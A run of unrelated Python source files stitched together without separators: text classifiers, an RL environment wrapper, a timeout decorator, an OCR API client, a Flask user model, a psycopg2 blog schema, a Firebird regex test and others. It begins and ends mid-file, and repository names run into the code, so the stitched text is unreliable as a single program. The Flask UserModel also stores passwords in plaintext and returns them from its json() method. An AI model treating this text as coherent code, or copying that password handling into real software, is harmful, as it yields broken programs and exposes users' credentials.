self.char_lut(xch) # (TxB) x D x W char_vecs = char_embeds.transpose(1, 2).contiguous() mots = self.char_comp(char_vecs) return mots class ConvModel(WordClassifierBase): def __init__(self): super(ConvModel, self).__init__() def _init_pool(self, dsz, **kwargs): filtsz = kwargs['filtsz'] cmotsz = kwargs['cmotsz'] self.parallel_conv = ParallelConv(dsz, cmotsz, filtsz, "relu", self.pdrop) return self.parallel_conv.outsz def _pool(self, btc, lengths): embeddings = btc.transpose(1, 2).contiguous() return self.parallel_conv(embeddings) class LSTMModel(WordClassifierBase): def __init__(self): super(LSTMModel, self).__init__() def _init_pool(self, dsz, **kwargs): unif = kwargs.get('unif') hsz = kwargs.get('rnnsz', kwargs.get('hsz', 100)) if type(hsz) is list: hsz = hsz[0] self.lstm = nn.LSTM(dsz, hsz, 1, bias=True, dropout=self.pdrop) if unif is not None: for weight in self.lstm.parameters(): weight.data.uniform_(-unif, unif) return hsz def _pool(self, embeddings, lengths): embeddings = embeddings.transpose(0, 1) packed = torch.nn.utils.rnn.pack_padded_sequence(embeddings, lengths.tolist()) output, hidden = self.lstm(packed) hidden = hidden[0].view(hidden[0].shape[1:]) return hidden def make_input(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') y = batch_dict.get('y') lengths = batch_dict['lengths'] lengths, perm_idx = lengths.sort(0, descending=True) x = x[perm_idx] if xch is not None: xch = xch[perm_idx] if y is not None: y = y[perm_idx] if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() if y is not None: y = y.cuda() if y is not None: y = y.contiguous() return x, xch, lengths, y class NBowBase(WordClassifierBase): def __init__(self): super(NBowBase, self).__init__() def _init_pool(self, dsz, **kwargs): return dsz def _init_stacked(self, input_dim, **kwargs): kwargs['hsz'] = kwargs.get('hsz', [100]) return super(NBowBase, self)._init_stacked(input_dim, **kwargs) class NBowModel(NBowBase): def __init__(self): super(NBowModel, self).__init__() def _pool(self, embeddings, lengths): return torch.mean(embeddings, 1, False) class NBowMaxModel(NBowBase): def __init__(self): super(NBowMaxModel, self).__init__() def _pool(self, embeddings, lengths): dmax, _ = torch.max(embeddings, 1, False) return dmax # These define the possible models for this backend BASELINE_CLASSIFICATION_MODELS = { 'default': ConvModel.create, 'lstm': LSTMModel.create, 'nbow': NBowModel.create, 'nbowmax': NBowMaxModel.create } BASELINE_CLASSIFICATION_LOADERS = { 'default': ConvModel.load, 'lstm': LSTMModel.load, 'nbow': NBowModel.load, 'nbowmax': NBowMaxModel.load } def create_model(embeddings, labels, **kwargs): return create_classifier_model(BASELINE_CLASSIFICATION_MODELS, embeddings, labels, **kwargs) def load_model(outname, **kwargs): return load_classifier_model(BASELINE_CLASSIFICATION_LOADERS, outname, **kwargs) mk-fg/tahoe-lafs-public-cloudspubclouds/skydrive/__init__.py from allmydata.storage.backends.cloud.skydrive.skydrive_container import configure_skydrive_container configure_container = configure_skydrive_container """ A wrapper that converts the standardized environments to a format that the DeepQ and Deep SARSA(λ) implementations made by Gerben accept. """ import core class StandardizedEnvWrapper(object): def __init__(self, env: core.DiscreteEnvironment, state_transformer): """ Initializes the standardized env wrapper :param env: The environment :param state_transformer: A function that extracts a numerical state representation from the Observation object. 
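Illustrative usage sketch (added example, not from the original module; `GridWorldEnv`, `obs_to_vector` and `some_action` are hypothetical stand-ins for a concrete core.DiscreteEnvironment, a state-transformer function and an action):
    wrapper = StandardizedEnvWrapper(GridWorldEnv(), obs_to_vector)
    state = wrapper.reset()
    while not wrapper.terminated:
        state, reward = wrapper.step(some_action)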
""" self.env = env self.state_transformer = state_transformer self.terminated = True self.render = False self.action_space = self.env.valid_actions() def reset(self): self.terminated = False observation = self.env.reset() return self.state_transformer(observation) def step(self, action: core.Action): self.env.render = self.render observation, reward = self.env.step(action) self.terminated = observation.terminal return self.state_transformer(observation), reward def set_rendering(self, rendering): self.env.render = rendering self.render = rendering import functools import signal def timeoutable(seconds=5, message="execution timed out"): """ Times out a callable's execution if its runtime exceeds `seconds`. Examples: ```python import time from flashback import timeoutable @timeoutable(1) def fast(): time.sleep(0.1) return True fast() #=> True @timeoutable(1) def slow(): time.sleep(3) return True slow() #=> TimeoutError: Execution timed out ``` Params: seconds (int): the number of seconds to wait before timing out message (str): the custom message to display when timing out Return: Callable: a wrapper used to decorate a callable Raises: TimeoutError: if the callable's execution time is longer than `seconds` """ def wrapper(func): def _sigalrm_handler(_signum, _frame): raise TimeoutError(message) @functools.wraps(func) def inner(*args, **kwargs): signal.signal(signal.SIGALRM, _sigalrm_handler) signal.alarm(seconds) try: return func(*args, **kwargs) finally: signal.alarm(0) return inner return wrapper examples/compass_stats.py #!/usr/bin/env python """ Print a list of survey participants with their total feet surveyed. usage: compass_stats.py DATFILE... Example: $ ./examples/compass_stats.py caves/*.dat : 100262.7 : 50677.9 : 49401.7 : 47950.6 : 40586.3 : 35925.8 : 33693.5 : 32673.2 : 31508.3 : 27521.8 ... """ import sys import logging from davies import compass def compass_stats(datfiles): stats = {} for datfile in datfiles: for survey in compass.DatFile.read(datfile): for name in survey.team: stats[name] = stats.get(name, 0.0) + survey.length for name in sorted(stats, key=stats.get, reverse=True): print "%s:\t%0.1f" % (name, stats[name]) if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) if len(sys.argv) == 1: print >> sys.stderr, "usage: compass_stats.py DATFILE..." sys.exit(2) compass_stats(sys.argv[1:]) movie/__init__.py class Actor: def __init__(self, name, last_name, role): self.name = name self.last_name = last_name self.role = role def __str__(self): return f"name = {self.name}, last name = {self.last_name}, role in movie = {self.role}" class Movie: def __init__(self, title, date_released, actors): self.title = title self.date_released = date_released self.actors = actors def __str__(self): list_of_str_actors = [] for actor in self.actors: list_of_str_actors.append(str(actor)) return f"title of movie = {self.title}, release date = {self.date_released}, actors = {list_of_str_actors}" from enalp_cli import __version__ from enalp_cli.enalp_cli import main from click.testing import CliRunner def test_version(): assert __version__ == '0.1.0' def test_tokens_word(): runner = CliRunner() result = runner.invoke(main,['tokens','Hello world']) assert "['Hello', 'world']" in result.output assert result.exit_code == 0 def test_tokens_sentence(): runner = CliRunner() result = runner.invoke(main,['tokens','--tokentype','sentence',"Hello word. 
I'm John"]) assert '[Sentence("Hello word.")' in result.output assert result.exit_code == 0 def test_sentiment(): runner = CliRunner() result = runner.invoke(main,['sentiment',"This movie is wonderful"]) assert 'Sentiment(polarity=1.0, subjectivity=1.0)' in result.output assert result.exit_code == 0 def test_pos(): runner = CliRunner() result = runner.invoke(main,['pos',"Hello, my name is Ros"]) assert "[('Hello', 'NNP'), ('my', 'PRP$')" in result.output assert result.exit_code == 0 def test_readfile(): runner = CliRunner() result = runner.invoke(main,['readfile','./enalp_cli/sample.txt']) assert "Word Tokens: ['the', 'movie', 'was', 'great']" in result.output assert result.exit_code == 0 def test_posdictionary(): runner = CliRunner() result = runner.invoke(main,['posdictionary']) assert "CD cardinal digit" in result.output assert result.exit_code == 0 def test_about(): runner = CliRunner() result = runner.invoke(main,['about']) assert "ENALP CLI: Easy NAtural Language Processing CLI" in result.output assert result.exit_code == 0 def test_leet(): runner = CliRunner() result = runner.invoke(main,['leet','Hello Word!']) assert "Leet Version: #3110" in result.output assert result.exit_code == 0 def test_reverse(): runner = CliRunner() result = runner.invoke(main,['reverse',"Hello Word!"]) assert "Reverse Version:" in result.output assert result.exit_code == 0 def test_mixup(): runner = CliRunner() result = runner.invoke(main,['mixup','Hello Word!']) assert "MixUp Version:" in result.output assert result.exit_code == 0 def test_plural(): runner = CliRunner() result = runner.invoke(main,['plural','watch child']) assert "['watches', 'children']" in result.output assert result.exit_code == 0 def test_correction(): runner = CliRunner() result = runner.invoke(main,['correction','I havv a gooda spelling']) assert "I have a good spelling" in result.output assert result.exit_code == 0 def test_definition(): runner = CliRunner() result = runner.invoke(main,['definition','home']) assert "['where you live at a particular time'" in result.output assert result.exit_code == 0 def test_spell_check(): runner = CliRunner() result = runner.invoke(main,['spell-check','humman']) assert "('human', 1.0)" in result.output assert result.exit_code == 0 def test_word_count(): runner = CliRunner() result = runner.invoke(main,['word-count','--word_to_search','PYthoN','PYTHON Python python']) assert "cointains 3 time(s) the word" in result.output assert result.exit_code == 0 def test_translation(): runner = CliRunner() result = runner.invoke(main,['translation','Buongiorno, oggi è una bella giornata']) assert "Good morning, today is a beautiful" in result.output assert result.exit_code == 0 def test_ldetect(): runner = CliRunner() result = runner.invoke(main,['ldetect','Buongiorno, oggi è una bella giornata']) assert "The language in the Text is it" in result.output assert result.exit_code == 0 def test_lemmatize(): runner = CliRunner() result = runner.invoke(main,['lemmatize','We watched octopi and played cards']) assert "'We', 'watch', 'octopus', 'and', 'play', 'card'" in result.output assert result.exit_code == 0 import collections import copy import functools import logging from typing import ( Callable, Hashable, Optional, ) from litecore.mappings.types import MutableMappingFactory log = logging.getLogger(__name__) # TODO: checking pickling/json/copy/deepcopy for all class LastUpdatedOrderedDict(collections.OrderedDict): """Store items in the order in which keys were added/updated. 
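For illustration (example added here, not part of the original recipe): re-assigning an existing key moves it to the end of the iteration order.
    >>> d = LastUpdatedOrderedDict([('a', 1), ('b', 2)])
    >>> d['a'] = 3
    >>> list(d)
    ['b', 'a']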
From the recipe in the Python documentation: https://docs.python.org/3/library/collections.html#collections.OrderedDict """ def __setitem__(self, key, value): super().__setitem__(key, value) super().move_to_end(key) class OrderedDefaultDict(collections.OrderedDict): def __init__( self, default_factory: Optional[Callable] = None, *args, **kwargs, ): if default_factory is not None and not callable(default_factory): msg = f'First argument (default_factory) must be callable or None' raise TypeError(msg) super().__init__(*args, **kwargs) self.default_factory = default_factory def __repr__(self): items = list(self.items()) return f'{type(self).__name__}({self.default_factory!r}, {items!r})' def __missing__(self, key: Hashable): if self.default_factory is None: raise KeyError(key) self[key] = value = self.default_factory() return value def copy(self): return self.__copy__() def __copy__(self): return type(self)(self.default_factory, self) def __deepcopy__(self, memo): items = tuple(self.items()) return type(self)(self.default_factory, copy.deepcopy(items)) def __reduce__(self): args = (self.default_factory,) if self.default_factory else tuple() return type(self), args, None, None, iter(self.items()) class OrderedCounter(collections.Counter, collections.OrderedDict): """ Examples: >>> od = OrderedCounter('abracadabra') >>> od OrderedCounter(OrderedDict([('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)])) >>> od.least_common() [('d', 1), ('c', 1), ('r', 2), ('b', 2), ('a', 5)] """ def __repr__(self) -> str: return f'{type(self).__name__}({collections.OrderedDict(self)!r})' def __reduce__(self): return type(self), (collections.OrderedDict(self),) class _RecursiveDefaultDict: def __init__(self, factory): self._factory = factory def __call__(self): return self._factory(self) def recursive_defaultdict( defaultdict_factory: MutableMappingFactory = collections.defaultdict, ): return defaultdict_factory(_RecursiveDefaultDict(defaultdict_factory)) def nested_defaultdict( default_factory, *, defaultdict_factory: MutableMappingFactory = collections.defaultdict, depth: int = 1, ): depth = litecore.validate.as_int(depth) if depth < 1: msg = f'Depth must be >= 1; got {depth!r}' raise ValueError(msg) factory = functools.partial(defaultdict_factory, default_factory) for _ in range(depth - 1): factory = functools.partial(defaultdict_factory, factory) return factory() DorenCalliku/distributionsrc/CountryGraph.py import networkx as nx import pandas as pd import random, json import numpy as np, numpy.random from unidecode import unidecode class CountryGraph: """ Creates a distribution of the cities spatially based on data. To represent each city properly we need to pass them as nodes, and put several factors that suggest the movement of the people in them. """ def __init__(self, country="Turkey"): """ country: the country's name, that will be read from a configuration file. subs: the cities and their sub-cities which will be used for mapping back. G: the graph containing the cities. 
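Minimal construction sketch (added example; assumes the geo_data CSV and road files referenced below are present on disk):
    graph = CountryGraph(country='Turkey')
    graph.display_graph()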
""" self.country = country self.subs = {} self.G = nx.Graph() # setup self.__read_cities() # transportation self.__update_roads() #self.__update_ports() def __read_cities(self): """Update all the cities, and the sub-cities connected to them.""" self.cities = pd.read_csv("geo_data/cities_" + self.country.lower() +".csv") cities_subs = pd.read_csv("geo_data/cities_" + self.country.lower() + "_subs.csv") for e in range(len(cities_subs)): self.subs[ cities_subs.iloc[e]['city']] = cities_subs.iloc[e]['admin'] for city in list(self.cities['city']): city_properties = self.cities[self.cities['city'] == city].iloc[0] self.G.add_node(City( name=city_properties['city'], position=(city_properties['lat'], city_properties[ 'lng']), area=int(city_properties['Area(km²)'].replace(',','')), air=0, port=0)) def __update_roads(self): """Create the connections in the graph which represent roads.""" with open("geo_data/roads_turkey") as f: self.roads = list(json.loads( json.load( f)).values()) road_cities = [] for road in self.roads: road = self.remove_duplicates([self.subs[i] for i in road]) road_cities += road # add the cities which are connected to this road for i in range(len(road)-1): self.G.add_edge( road[i], road[i+1], weight=10) road_cities = set(road_cities) not_found = set( self.cities['city']) - set(road_cities) # order cities present in list by distance to this city for each in not_found: city = self.cities[ self.cities['city'] == each].iloc[0] found = self.cities[ self.cities['city'].isin( road_cities)] found['distance'] = ((found['lat']-city['lat'])**2 + (found['lng']-city['lng'])**2) closest_city = found.sort_values('distance').iloc[1]['city'] self.G.add_edge( city['city'], closest_city, weight=10) def display_graph(self): pos = {city:(long, lat) for (city, (lat,long)) in nx.get_node_attributes(self.G, 'position').items()} nx.draw(self.G, pos, with_labels=False, node_size=10, node_color='r', edge_color='b') def __update_ports(self): with open("geo_data/ports_turkey.json") as f: ports = json.load(f) for each in ports['airport']: self.G.nodes[self.subs[each]]['air'] = 1 for each in ports['port']: self.G.nodes[self.subs[each]]['port'] = 1 @staticmethod def remove_duplicates(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))]ozeiasgodoy/api_flask_ssys from data import alchemy class UserModel(alchemy.Model): __tablename__ = 'user' id = alchemy.Column(alchemy.Integer, primary_key=True) name = alchemy.Column(alchemy.String(80)) password = alchemy.Column(alchemy.String(80)) def __init__(self, name, password): self.name = name self.password = password def json(self): return {'name': self.name, 'password': self.password} @classmethod def find_by_name(cls, name): return cls.query.filter_by(name=name).first() def save_to_db(self): alchemy.session.add(self) alchemy.session.commit() def delete_from_db(self): alchemy.session.delete(self) alchemy.session.commit() bok/AI-with-Pyke # -*- coding: utf-8 -*- ##################################################################### # This program is free software. It comes without any warranty, to # # the extent permitted by applicable law. You can redistribute it # # and/or modify it under the terms of the Do What The Fuck You Want # # To Public License, Version 2, as published by Sam Hocevar. See # # http://sam.zoy.org/wtfpl/COPYING for more details. 
# ##################################################################### from agent import UAgent from object import UObject from universe import Universe from test import Test class Test(Test): def __init__(self): """ Trivial test Alice is at location 0, can move, and wants herself to be in location 1. Expected result : Alice moves from 0 to 1.""" alice = UAgent( 'Alice', ['move'], [('know', 'Alice', ('location', 'Alice', 1))] ) uni = Universe(2) uni.add(alice, 0) self.agents = [alice] self.objects = [] self.universe = uni self.nb_iteration_max = 2 self.test_name = 'Test of the move action.' #!/usr/bin/python3 # number of output figures = 2 from helper.figure import Figure import helper.plot lineNames = ["B-spl. surrogate", "Linear surrogate", "Objective function"] markerStyles = [".", "^", "v"] lineStyles = ["-", "--", ":"] fig = Figure.create(figsize=(5, 2)) ax = fig.gca() functionNames = ["Bra02", "GoP", "Sch06", "Ack", "Alp02", "Sch22"] lines = [{ "label" : r"\rlap{{{}}}".format(lineNames[r]), "marker" : markerStyles[r], "ms" : (6 if r == 0 else 3), "ls" : lineStyles[r], "color" : "k", } for r in range(len(lineNames))] lines = [(lines[r//2] if r % 2 == 0 else None) for r in range(2 * len(lines))] helper.plot.addCustomLegend(ax, ( [{ "label" : functionNames[r], "ls" : "-", "color" : "C{}".format(r), } for r in range(len(functionNames))] + lines ), ncol=6, loc="upper center", outside=True) ax.set_axis_off() fig.save() fig = Figure.create(figsize=(5, 2)) ax = fig.gca() lines = [{ "label" : lineNames[r], "marker" : markerStyles[r], "ms" : (6 if r == 0 else 3), "ls" : lineStyles[r], "color" : "k", } for r in range(len(lineNames)) ] helper.plot.addCustomLegend(ax, lines, ncol=3, loc="upper center", outside=True) ax.set_axis_off() fig.save() import traceback import cv2 import numpy import base64 import requests from .utils import fix from ..utils.log import logger from ..utils.recognize import RecognizeError class Language: Arabic = 'ara' Bulgarian = 'bul' Chinese_Simplified = 'chs' Chinese_Traditional = 'cht' Croatian = 'hrv' Danish = 'dan' Dutch = 'dut' English = 'eng' Finnish = 'fin' French = 'fre' German = 'ger' Greek = 'gre' Hungarian = 'hun' Korean = 'kor' Italian = 'ita' Japanese = 'jpn' Norwegian = 'nor' Polish = 'pol' Portuguese = 'por' Russian = 'rus' Slovenian = 'slv' Spanish = 'spa' Swedish = 'swe' Turkish = 'tur' class API: def __init__( self, endpoint='https://api.ocr.space/parse/image', api_key='helloworld', language=Language.Chinese_Simplified, **kwargs, ): """ :param endpoint: API endpoint to contact :param api_key: API key string :param language: document language :param **kwargs: other settings to API """ self.timeout = (5, 10) self.endpoint = endpoint self.payload = { 'isOverlayRequired': True, 'apikey': api_key, 'language': language, **kwargs } def _parse(self, raw): logger.debug(raw) if type(raw) == str: raise RecognizeError(raw) if raw['IsErroredOnProcessing']: raise RecognizeError(raw['ErrorMessage'][0]) if raw['ParsedResults'][0].get('TextOverlay') is None: raise RecognizeError('No Result') # ret = [] # for x in raw['ParsedResults'][0]['TextOverlay']['Lines']: # left, right, up, down = 1e30, 0, 1e30, 0 # for w in x['Words']: # left = min(left, w['Left']) # right = max(right, w['Left'] + w['Width']) # up = min(up, w['Top']) # down = max(down, w['Top'] + w['Height']) # ret.append([x['LineText'], [(left + right) / 2, (up + down) / 2]]) # return ret ret = [x['LineText'] for x in raw['ParsedResults'][0]['TextOverlay']['Lines']] return ret def ocr_file(self, fp): """ 
Process image from a local path. :param fp: A path or pointer to your file :return: Result in JSON format """ with (open(fp, 'rb') if type(fp) == str else fp) as f: r = requests.post( self.endpoint, files={'filename': f}, data=self.payload, timeout=self.timeout, ) return self._parse(r.json()) def ocr_url(self, url): """ Process an image at a given URL. :param url: Image url :return: Result in JSON format. """ data = self.payload data['url'] = url r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) return self._parse(r.json()) def ocr_base64(self, base64image): """ Process an image given as base64. :param base64image: Image represented as Base64 :return: Result in JSON format. """ data = self.payload data['base64Image'] = base64image r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) return self._parse(r.json()) def ocr_image(self, image: numpy.ndarray): data = self.payload data['base64Image'] = 'data:image/jpg;base64,' + \ base64.b64encode(cv2.imencode('.jpg', image)[1].tobytes()).decode() retry_times = 1 while True: try: r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) break except Exception as e: logger.warning(e) logger.debug(traceback.format_exc()) retry_times -= 1 if retry_times > 0: logger.warning('Retrying...') else: logger.warning('No network or network failure, unable to connect to OCR Space') return [] try: return self._parse(r.json()) except Exception as e: logger.debug(e) return [] def predict(self, image, scope): ret = self.ocr_image(image[scope[0][1]:scope[2][1], scope[0][0]:scope[2][0]]) if len(ret) == 0: return None return fix(ret[0]) # Copyright 2021 National Technology & Engineering Solutions # of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, # the U.S. Government retains certain rights in this software. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import logging import numpy import cicada.additive import cicada.communicator import cicada.interactive logging.basicConfig(level=logging.INFO) with cicada.communicator.NNGCommunicator(timeout=300) as communicator: log = cicada.Logger(logging.getLogger(), communicator) protocol = cicada.additive.AdditiveProtocol(communicator) total = protocol.share(src=0, secret=protocol.encoder.encode(numpy.array(0)), shape=()) for i in range(communicator.world_size): share = cicada.interactive.secret_input(protocol=protocol, encoder=protocol.encoder, src=i) total = protocol.add(total, share) total = protocol.encoder.decode(protocol.reveal(total)) log.info(f"Player {communicator.rank} total: {total}") #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed May 12 09:16:20 2021 @author: trondkjekstad """ from psycopg2 import ( connect ) cleanup = ( 'DROP TABLE IF EXISTS blog_user CASCADE', 'DROP TABLE IF EXISTS post' ) commands = ( """ CREATE TABLE blog_user ( user_id SERIAL PRIMARY KEY, user_name VARCHAR(255) UNIQUE NOT NULL, user_password VARCHAR(255) NOT NULL ) """, """ CREATE TABLE post ( post_id SERIAL PRIMARY KEY, author_id INTEGER NOT NULL, created TIMESTAMP DEFAULT NOW(), title VARCHAR(350) NOT NULL, body VARCHAR(500) NOT NULL, FOREIGN KEY (author_id) REFERENCES blog_user (user_id) ) """) sqlCommands = ( 'INSERT INTO blog_user (user_name, user_password) VALUES (%s, %s) RETURNING user_id', 'INSERT INTO post (title, body, author_id) VALUES (%s, %s, %s)' ) conn = connect("dbname=Paal_SE4GI user=postgres password=") cur = conn.cursor() #for command in cleanup : # cur.execute(command) #for command in commands : # cur.execute(command) # print('execute command') #cur.execute(sqlCommands[0], ('Giuseppe', '3ety3e7')) #userId = cur.fetchone()[0] #cur.execute(sqlCommands[1], ('My First Post', 'This is the post body', userId)) #cur.execute('SELECT * FROM post') #print(cur.fetchall()) #cur.close() #conn.commit() #conn.close() #coding:utf-8 # # id: bugs.core_2952 # title: Case-sensitive character class names in SIMILAR TO # decription: # tracker_id: CORE-2952 # min_versions: ['3.0'] # versions: 3.0, 4.0 # qmid: None import pytest from firebird.qa import db_factory, isql_act, Action # version: 3.0 # resources: None substitutions_1 = [] init_script_1 = """""" db_1 = db_factory(charset='UTF8', sql_dialect=3, init=init_script_1) test_script_1 = """ -- NOTE: -- 1. This test can NOT be applied on 2.5 because of error: -- Statement failed, SQLSTATE = 42000 -- Invalid SIMILAR TO pattern -- 2. 
Seems that polish letter 'Ł' is NOT considered as having accent set term ^; execute block as begin begin execute statement 'drop collation co_utf8_ci_ai'; when any do begin end end begin execute statement 'drop collation co_utf8_cs_as'; when any do begin end end begin execute statement 'drop collation co_utf8_ci_as'; when any do begin end end end ^ set term ;^ commit; create collation co_utf8_ci_ai for utf8 from unicode case insensitive accent insensitive; create collation co_utf8_cs_as for utf8 from unicode case sensitive accent sensitive; create collation co_utf8_ci_as for utf8 from unicode case insensitive accent sensitive; commit; set list on; with recursive d as ( select cast('aeiouyAEIOUYáéíóúýàèìòùâêîôûãñõäëïöüÿçšąęźżăşţÁÉÍÓÚÝÀÈÌÒÙÂÊÎÔÛÃÑÕÄËÏÖÜŸÇŠĄĘŹŻĂŞŢ'||ascii_char(9)||ascii_char(10)||ascii_char(32) as varchar(100) character set utf8) s from rdb$database ) ,r as(select 1 i from rdb$database union all select r.i+1 from r where r.i < 100) ,e as( select substring(d.s from r.i for 1) c from d join r on r.i <= char_length(d.s) ) select decode( e.c, ascii_char(9),' ', ascii_char(10),' ', ascii_char(32), '\\w', e.c ) c -- ALPHA Latin letters a..z and A..Z. With an accent-insensitive collation, -- this class also matches accented forms of these characters. ,iif( e.c collate co_utf8_ci_ai similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_as -- [:LOWER:] Lowercase Latin letters a..z. Also matches uppercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:LoWer:]]', 1, 0 ) s_lower_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:lOwEr:]]', 1, 0 ) s_lower_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:lowER:]]', 1, 0 ) s_lower_ci_as -- [:UPPER:] Uppercase Latin letters A..Z. Also matches lowercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:uPPer:]]', 1, 0 ) s_upper_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:uPpeR:]]', 1, 0 ) s_upper_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:UpPeR:]]', 1, 0 ) s_upper_ci_as -- [:WHITESPACE:] Matches vertical tab (ASCII 9), linefeed (ASCII 10), horizontal -- tab (ASCII 11), formfeed (ASCII 12), carriage return (ASCII 13) and space (ASCII 32). 
,iif( e.c similar to '[[:WhiTespacE:]]', 1, 0 ) s_white_space from e ; """ act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1) expected_stdout_1 = """ C a S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C e S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C i S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C o S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C u S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C A S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C E S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C I S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C O S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C U S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C Y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C é S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 